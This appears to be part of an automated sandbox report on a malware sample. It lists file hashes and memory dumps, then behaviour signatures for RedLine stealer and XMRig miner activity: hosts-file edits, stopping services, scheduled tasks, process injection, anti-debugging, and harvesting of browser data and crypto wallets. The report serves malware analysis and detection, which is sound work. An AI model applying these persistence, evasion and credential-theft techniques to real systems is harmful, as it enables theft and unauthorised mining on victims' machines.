| SHA512 | 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0 |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\GPUCache\data_2
| MD5 | 0962291d6d367570bee5454721c17e11 |
| SHA1 | 59d10a893ef321a706a9255176761366115bedcb |
| SHA256 | ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7 |
| SHA512 | f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\GPUCache\data_3
| MD5 | 41876349cb12d6db992f1309f22df3f0 |
| SHA1 | 5cf26b3420fc0302cd0a71e8d029739b8765be27 |
| SHA256 | e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c |
| SHA512 | e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\DevToolsActivePort
| MD5 | 5b975073e1ffaaeae7201e98d7a1f6cb |
| SHA1 | 167ef4a630e54a7f726e76997cff28de1cb921a0 |
| SHA256 | 675b4ddd4bc6826579c52b142bccc673a8d63e1b33437d73984abcd1cff79a8e |
| SHA512 | 286d7feb9d620a75720a72db34185a551c76a49c4a5fdf51690d15ec518a8da538716ee4d30d0c3e6317a7dfba921e89617803e3c433b238ece3f81ec7b25c38 |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Code Cache\js\2e64514b9cd267ab_0
| MD5 | c896f1c9beb6dceb198275bd1e1315e4 |
| SHA1 | 828bb3704a97cc2878eb2fd23e0e2a386cca30a0 |
| SHA256 | f9fa0a9069a297378a3e59e91fa5aa6c9468e8a56bb6463e5df6927c806b3ade |
| SHA512 | b8ab7e4e65437038816639bc53f9309f9c75451adb9b85e0ebc49ca11678e5aa9d70b9c876cc46214fb0ad5155bcbb0b873ebb80fdc534323a58ee52adfe9745 |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Code Cache\js\2b3a9481efde3cbc_0
| MD5 | 4e56664468a04e1e98da1feb0f2039a8 |
| SHA1 | 6edfd35add9130bed8740d8d644e3e6df63cafd9 |
| SHA256 | 9e50ec5d5e8aa43b275d00b766f6feca975be70ec1bfe1e71ea8ff51f397eceb |
| SHA512 | 39ff7ba5a08322c5bd325af4f15795db84ab4a245a6e2780a95e5c08c48f5545e6a6a208569b6f0e83717bf9341f17d5a477a137c51eac824459dfbbbfdac834 |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Code Cache\js\2016c72aa5f54f52_0
| MD5 | 621c3438c2201381503216bc82f1b9b8 |
| SHA1 | cbc2d40ca05d1aaaf5375760cf798126f62104f7 |
| SHA256 | 997e00e1e5a61f6dc54a4efcd59cffc7858a617118eb51301b51f2b87b488289 |
| SHA512 | 6d55e44d2d664393b181d9197001a4d0d479d35d8776210aa19562094cc4eafc2231feb8535d1a8817fa62146ba3f1ec3295f53fa847744c4cc4cbb376c6290f |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Code Cache\js\10e544c7a72e2f65_0
| MD5 | 1f909b9f819f7451056206c332862343 |
| SHA1 | 2f2333d4c93e074089a53a0a8c592c1a05d68803 |
| SHA256 | 29d9db7ebae99f81074f9258e766e461944f4f2c9136ec17768ee2f7533e76a7 |
| SHA512 | 4ee354ce54bfae338c40019544f6aa38ca43e1ca676e66d01c295d3d4b11f2c86364e9109634722b3e0da1d9dcb3f0369c8e910931ada1b98c4e66a3040f281a |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Code Cache\js\09573a350af940e7_0
| MD5 | 16e8eeb48e04d207ab04724eba3b26f0 |
| SHA1 | 725c6d5f79a50c44b3ef4196d675e2db3d263d6f |
| SHA256 | 4cf1ab3c7eb542c879ea81ab8f63eccb93388d889c791c8a158aec76a551f57d |
| SHA512 | a17dd8be1c4ec84babf87c2ee5663066d1ed8b0284b054b320af25c8e85de000e571c56d2c8705aab48e138f845d087bbba13aa0bfa0922bda768ca7f68d1d2a |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Code Cache\js\06db5837b6c74111_0
| MD5 | c53c1241c2257991c4a51c5360673af4 |
| SHA1 | edf1eb527e38eef5a701f560e5d318d533b93d50 |
| SHA256 | a7201b092a458dfd37652f9f69bf5c76d634f5ba7c394c0e8124bd1c0026e730 |
| SHA512 | 7b500dc5b7aa02179db066ed52f606a7d455b7e7d4665d01548cf252d96adc788cd7e564a48399589300402be0559b76db4bcfeb2aa3c0b61a98852d0859c6a2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\index
| MD5 | edc7b264910eae8bd617254de9a08071 |
| SHA1 | c6a99c13d202d60dd57274d43b56ac180ba90956 |
| SHA256 | 0a96742762152608f9bd36ca2adc3d479f3e5729448967580221a44cf8862c2d |
| SHA512 | b832bbe13d8ae49daa5c335f08fc2ab4e272df44e1a60df01d38e48b6cfaaf4e4be503f364c0d7930c84f27020d6eb902e4df6d901d039719071b10ca613f890 |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\f_000012
| MD5 | 3eff107111d8dfc91e048573b1f227d8 |
| SHA1 | dde20da014e819d11e138b346121cc97791e9dcd |
| SHA256 | 0e8fc4bbc6a3e0c34adf9ee888b297d516d0db0a9cdc5b3632a01484d418374d |
| SHA512 | 223386fb5bd3709b1929a52ead00e81494fe81f822301acbf3920a4292432ffce5dda21c503622f9f373807cd447b7209a8dfd193d4ce8cc44e0b100db8a74fd |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\f_000011
| MD5 | af5094423f8dcbd63dbbfccd1598be41 |
| SHA1 | d5f212b31dc86dd9f1d8f4b012783af961f920b5 |
| SHA256 | 80b2f6b064b59afdbb209459b8dbede829bfee906baedc0cc60d526bf1bad058 |
| SHA512 | 41e94ef63d25221daed04e7a81ca491ab9516e2a1f97cb3c705cac172b79dd65c84dc43ad575d14cf176b68c4f1ad58f7d08addf216172f0631ec88e6b100a93 |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\f_000010
| MD5 | d75ebe2eae6831b2bad7c665fa05b3c0 |
| SHA1 | a27cd3066609c8a224cef7efa40c2cf630e55062 |
| SHA256 | 45b20e9d4ecb765ff1f346e050930f8142e92cfbe54675d166c03fa2ca0154da |
| SHA512 | 64e5dfb1b8e3d78166723a12a1856d17a577df364694404c27979bc24e9305f60370719e78b5d906f7c00dc6fb8792f0f9d598eccdbd9ec260e487ecc6b14f0e |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\f_00000f
| MD5 | 789fd4f17cc11ac527dc82ac561b3220 |
| SHA1 | 83ac8d0ad8661ab3e03844916a339833169fa777 |
| SHA256 | 5459e6f01b7edde5f425c21808de129b69470ee3099284cb3f9413d835903739 |
| SHA512 | 742d95bb65dcc72d7ce7056bd4d6f55e2811e98f7a3df6f1b7daef946043183714a8a3049b12a0be8ac21d0b4f6e38f7269960e57b006dfec306158d5a373e78 |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\f_00000e
| MD5 | 250bdff8769a9791656b1475a293c486 |
| SHA1 | 31ccb16008e78db499d1cc68cff74ebf1979f1a1 |
| SHA256 | aca7dc1db7b861fa7c839ae3c537ed48b098ffedc1151c0fb95e744af1cb7738 |
| SHA512 | ba37f07adc32644e34700559f11a654a7862787ab1bb5bd53040c42b16a80f336823dca61e202a07130ad0845335b2d92b404567eded9619b4569d1b544ebcf2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\f_00000d
| MD5 | 189badc72a668aade50699ae05067c2a |
| SHA1 | 5458410fc96bcf08b29f204b05470dad5882afb9 |
| SHA256 | 896d76b06fe7bc62fa10e8f9091b84584d8fdbd7eaaea1183f7c1e5e3a98c559 |
| SHA512 | 287ff71f9b6ab261f989792cfee0b99e1745c57e8e8c9c3c55e07592a835008673a9ee5b2099ef9beb6ef4343c10827109b281b2fbed0fe0de1da020723c622b |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\f_00000c
| MD5 | 7db3096a5ce269d5140afbedb84e0fb7 |
| SHA1 | 1155014e26835855c4177e8916b0bbcd5e4cca61 |
| SHA256 | 48662b9313a828746c1ba3edfa196d8ecd6b0ca730848ead5418fcde8da4a809 |
| SHA512 | a349f3265db5ebff9e535778ccc92bc846fa9a4175dbf4d9c0e5b77d294ae521eca5f104d45f0eab0bba88120a08103ce997a420ecace703e211796e842ca7dc |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\f_00000b
| MD5 | 9f1c899a371951195b4dedabf8fc4588 |
| SHA1 | 7abeeee04287a2633f5d2fa32d09c4c12e76051b |
| SHA256 | ba60b39bc10f6abd7f7a3a2a9bae5c83a0a6f7787e60115d0e8b4e17578c35f7 |
| SHA512 | 86e75284beaff4727fae0a46bd8c3a8b4a7c95eceaf45845d5c3c2806139d739c983205b9163e515f6158aa7c3c901554109c92a7acc2c0077b1d22c003dba54 |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\f_00000a
| MD5 | 2d52125a96fb5a7227c67848bc18f65c |
| SHA1 | a3593c6d8e3b6b458b6bbc2c6423dc76e30a84a3 |
| SHA256 | 61f3154c19e46e1989d6fadbfe20835d0c9fc47242dc5828e776e3ec667fda24 |
| SHA512 | 5f151708007cb474e64e8968b1f6b5e5331c434cc237627c6c5c92d1894d020f476ad88461e35fbf383aa46750a9cdcaf3a2ac8fe90570753c73fcf17ac0cbe6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\f_000009
| MD5 | 7d75a9eb3b38b5dd04b8a7ce4f1b87cc |
| SHA1 | 68f598c84936c9720c5ffd6685294f5c94000dff |
| SHA256 | 6c24799e77b963b00401713a1dbd9cba3a00249b9363e2c194d01b13b8cdb3d7 |
| SHA512 | cf0488c34a1af36b1bb854dea2decfc8394f47831b1670cab3eed8291b61188484cc8ab0a726a524ecdd20b71d291bcccbc2ce999fd91662aca63d2d22ed0d9f |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\f_000008
| MD5 | c101a8ba729b894927d7d884e4be68a8 |
| SHA1 | 4bf48f94ff4e50e81c9d83b641af74b3bed580a0 |
| SHA256 | 544f08482a62485be4acbc443462b01fe16b408b3d154c0cb1ff921a453cee33 |
| SHA512 | 77483a92abeed799dfb1e782988569875b29eccebfb14e5be353302849ea6f0ac6a6411a72d6da706ec3767a54f12907fd0bfa4646ad4ca1cf4e1e15fbe9a9ed |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\f_000007
| MD5 | f03b2a8e7ab245e03fc0609c96c949e9 |
| SHA1 | 6bb1564e13187fdf8e4722e509983ec80bf45724 |
| SHA256 | 52ba2e87765b525803652b484d86a48af8fb5488dc102500f6ed010072d01321 |
| SHA512 | 99026ce60571e4903a33be62b55d60b44487c3cae1af4b0c71e276d91ab62307d0bd63ed46e1949f06ef80c84a15cbb44cff4af2b5f592af91f215b40bb8e8f4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\f_000006
| MD5 | 6a3bb9c5ba28ee73af6c1b53e281b0cf |
| SHA1 | d96e403c99c1707f82ea29c2c1f134e792c64097 |
| SHA256 | 2f5adfc38558162578ffe112229f10417fbc4b3df025d153d4e22a0c95177740 |
| SHA512 | 6c4844f70969938339cb6716a834a79e1a8379459c87b983c2518b9cbb560cb2f101aff980f682989928523be6cdc99bde3bfd8137f9c54a58191b900b580fbf |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\f_000005
| MD5 | 5641d2e6eb6f88f5c306ef14bcda7513 |
| SHA1 | 1714fcfbf63fc8d860c0edb99ca221ac99194f07 |
| SHA256 | d573a0546fac381049946c0b0bdad4c42d2e60b572b79ed8c41e51894d9ef1ab |
| SHA512 | 2f4d2220ce860110fb6ad9b438b05d43551577f93f45bc97f56aa80c89e1a369734b64c190335a9df1963c547a5b607c5f8e3e229da906a36ff6f96d387a1774 |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\f_000004
| MD5 | b096dc9a3e4e6748a91abe826cf5d165 |
| SHA1 | b115fd9390e39b86a711039745cbad73741d7252 |
| SHA256 | 7552567793d51609afaac7d5e1b3d2289f1a64a323a84c74c28fe615075e1c3f |
| SHA512 | c075f36473b578f645ab66f1800d6e0a61b66719361c8c730ccb4505c1ab127ce96d5409c0c82aeddbc2bd03bef6c7a905310e4462ac7a0ebb2e07b45cf33a94 |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\f_000003
| MD5 | 21808cd0724524589cd4ec1ce26f6d58 |
| SHA1 | fc5cc4cb347ed20389626c58a6de396ef1ac5ada |
| SHA256 | 1a7608a326717e18f424991b924d9c7319eb273cc3af432585d95ce8b068ca8d |
| SHA512 | 36902ff35a1ed469aa9cab3856b1b0057ca7db8ea4d92ca1d129e68f02eebd5322a4e81aec29a2b1c0c289e2f82df13684ccf0305378878494260c4d4e6caf0d |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\f_000002
| MD5 | 01af703c52ac5a93685bb3911d6918f1 |
| SHA1 | cbb1279745c1c2208fb9b8606e3d3513cd5dc3e7 |
| SHA256 | 75ecbede729daef7531a6e43dcaf82afd1ac691c5a993231ddbe40254bf01653 |
| SHA512 | fbf1f2a3180f001cab1a860425f750010d6932479b343d5848ee0a78e03e29a46a123ee0103560d87df32daa3f6878cde07927e11e0615ad8e3c8e1568b942c6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\data_3
| MD5 | 81421137321ece3de85988fb03d253d5 |
| SHA1 | 33cdde6378e005219fd7657b87915d35d07624a1 |
| SHA256 | 0d14ed787c4fe9245df2c1124bc98fa6e30a0c6c7b55e94326d2ed88441d7e28 |
| SHA512 | 47d8be089b8105694530f30988e8c0386019a3984faeddf29145a0b6b6f9bbf91ed2326908ad5296a6699774aa38cb93168516f01f3248169016fa574ee0f082 |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\data_2
| MD5 | c82b8fb6221ff250eac0dc304a806fd1 |
| SHA1 | ea306835cf93d596ab9f998a4415d4d17b1fcdd9 |
| SHA256 | e32c348bfbc365b1b18fc1cadab9aa561855714a1da29a64e09cc3ab80f836bc |
| SHA512 | fad982bcda7f763eb4e01da2924c038f359537e1aafee6e517942ab5b5bea2665aee1a81b25b4163d50c43c0a08b11a69446ccf5b4760c506394ee494e990d20 |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\data_1
| MD5 | ef0c0ccef491d0f28be10aee8d498796 |
| SHA1 | 8882451b8c716b6a8a8744c5d9c4055d1624685e |
| SHA256 | 92502c0aa9ead0df15a105541800178063d2ae7412d6b1afb3af82c7b4030026 |
| SHA512 | 73f5325094a61901b200ad19a872d8b690c90f8e4a7f604ac1dea034e1625e218ea6595885d976ff98b39ab9127ddb01545f69f6d6c0b00e04b94060090606b1 |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\data_0
| MD5 | 58d10f941444fb5a3d9a4b6d646b7b1d |
| SHA1 | 974861942c807a7adeba558c347f8979b5cd8f22 |
| SHA256 | e1f60dd5512165f155104b5f3dcf7c232623c921e5825bc88b6dbbffa4488952 |
| SHA512 | 3c25825680f21afbdf4e7c2e4b1be7e79849aca4c34e1bbf07cdd17e07026795ef777832d0877183a0cf13223bae156b14d7ee9fb44122337bcebb1a77afbdab |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\chrome_debug.log
| MD5 | 7b1337c76ab33b915303603b6982e9b8 |
| SHA1 | 49935a0acc647a72ebc71407ca3a72ab96288bcf |
| SHA256 | 2e9402ab1cc51e7097ced94c5c33d6956cf4d10a07ad48ebbf2d492b52ab4361 |
| SHA512 | 3513482f3fb78be928fd01dab45b909025d2a8484d4ca24c4f86bef7a3163f09afc0a316b3ff5446143f38b2793bb33273a4b41495f0e4f050ba9b5d57db957f |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Crashpad\settings.dat
| MD5 | e97464a8a734e95498a104ffa66eaac3 |
| SHA1 | 1af7be0237e74bc33ba40ab0e1a00aebbf76ff91 |
| SHA256 | f3d8d3715bd397224ca6144eb4d7e832193c0eca5c7c9a5d1302deeccae91a15 |
| SHA512 | e616c7415e711843ddc5caefdcea3f1e57de6ec6efe859dd536ca217f1288d8f826bcfedb911b67c4ee7c9b37963d42186fa635ea2c1daf642f4bfe5de2daf32 |
memory/1668-749-0x0000000074420000-0x0000000074B0E000-memory.dmp
memory/1668-748-0x0000000000B10000-0x0000000001144000-memory.dmp
memory/2996-750-0x00000000199E0000-0x0000000019CC2000-memory.dmp
memory/2996-751-0x0000000000AA0000-0x0000000000AA8000-memory.dmp
memory/2996-752-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp
memory/2996-756-0x0000000001180000-0x0000000001200000-memory.dmp
memory/2996-755-0x0000000001180000-0x0000000001200000-memory.dmp
memory/2996-754-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp
memory/2996-753-0x0000000001180000-0x0000000001200000-memory.dmp
memory/2996-758-0x0000000001180000-0x0000000001200000-memory.dmp
memory/2996-759-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-08-12 08:45
Reported
2023-08-12 08:47
Platform
win10v2004-20230703-en
Max time kernel
146s
Max time network
151s
Command Line
Signatures
RedLine
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3328 created 3188 | N/A | C:\Windows\Temp\setup.exe | C:\Windows\Explorer.EXE |
| PID 3328 created 3188 | N/A | C:\Windows\Temp\setup.exe | C:\Windows\Explorer.EXE |
| PID 3328 created 3188 | N/A | C:\Windows\Temp\setup.exe | C:\Windows\Explorer.EXE |
| PID 3328 created 3188 | N/A | C:\Windows\Temp\setup.exe | C:\Windows\Explorer.EXE |
| PID 3328 created 3188 | N/A | C:\Windows\Temp\setup.exe | C:\Windows\Explorer.EXE |
| PID 3864 created 3188 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE |
| PID 3864 created 3188 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE |
| PID 3864 created 3188 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE |
| PID 3864 created 3188 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE |
| PID 3864 created 3188 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE |
| PID 3864 created 3188 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE |
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Windows\Temp\setup.exe | N/A |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Program Files\Google\Chrome\updater.exe | N/A |
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\mi.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cli.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cc.exe | N/A |
| N/A | N/A | C:\Windows\Temp\setup.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\updater.exe | N/A |
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cc.exe | N/A |
| N/A | N/A | C:\Windows\Temp\setup.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\updater.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3864 set thread context of 4624 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\System32\conhost.exe |
| PID 3864 set thread context of 4180 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\explorer.exe |
| PID 2068 set thread context of 2920 | N/A | C:\Users\Admin\AppData\Local\Temp\cli.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\106.0.5249.119\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File created | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Temp\setup.exe | N/A |
| File created | C:\Program Files\Google\Libs\WR64.sys | C:\Program Files\Google\Chrome\updater.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\cli.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
